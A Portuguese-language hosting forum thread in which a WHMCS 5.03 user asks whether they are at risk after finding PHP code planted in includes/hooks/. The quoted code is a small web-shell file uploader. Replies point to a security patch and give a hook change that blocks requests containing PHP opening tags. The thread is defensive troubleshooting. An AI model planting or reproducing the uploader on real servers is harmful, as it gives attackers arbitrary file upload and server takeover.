Ir para conteúdo
View in the app

A better way to browse. Learn more.

Portal do Host

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Tentativa de invsão no meu WHMCS

Featured Replies

Postado

Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/

<?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> )

Será que corro algum risco?

Estou usando a versão 5.03 do WHMCS

Valeu!

Não sei se a versão 5 ja vem com o patch de segurança instalado, porém se você ja instalou o patch de segurança anteriormente não corre nenhum risco, pelo menos são que eles alegam.

Postado

Re

Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ '; echo '

'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu!

Realmente não tem problema conforme o @lucasippon informou!

Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para



	if (strpos($_REQUEST[$checkvar],'<?php')!==false) {

	


Postado

Ja aconteceu comigo isso em janeiro agora tb.


Postado

Esse script do TIU Edvan é porreta mesmo!

Depois de colocar ele na pasta não tive mais problemas.

E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!!

Valeu Edvan.


Postado
Re Realmente não tem problema conforme o @lucasippon informou! Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para
 if (strpos($_REQUEST[$checkvar],'

Obrigado Edvan!


Postado

Esse script do TIU Edvan é porreta mesmo!

Depois de colocar ele na pasta não tive mais problemas.

E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!!

Valeu Edvan.

Obrigado Edvan!

Na verdade o script não é meu... Foi publicado em http://www.portaldohost.com.br/whmcs/onda-de-ataques-ao-whmcs-o-que-fazer sendo que o original é do http://www.webhostingtalk.com/showpost.php?p=7856656&postcount=68

Eu apenas dei uma incrementada ( bloqueio de IP + notificação/registro ).


Postado

Estou pensando seriamente em abandonar o WHMCS, embora sei que este esta entre os melhores senão o melhor gerenciador de host, mas infelizmente sua segurança é pífia. Notório que a empresa do WHMCS esta deixando a desejar, pois é inadmissível esta quantidade de problemas que esta ocorrendo em um produto que pagamos para funcionar corretamente.

Espero que não me levem a mal, pois como disse o WHMCS é excelente no quesito funcionalidade entretanto a partir do momento que temos que mudar pastas, mexer em códigos contratar módulos de segurança separados me parece descaso os usuários já que se isso resolve o problema, porque não tem uma versão com estas soluções.


Visitante
Este tópico está impedido de receber novos posts.

Quem Está Navegando 0

  • Nenhum usuário registrado visualizando esta página.

Informação Importante

Concorda com os nossos termos?

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.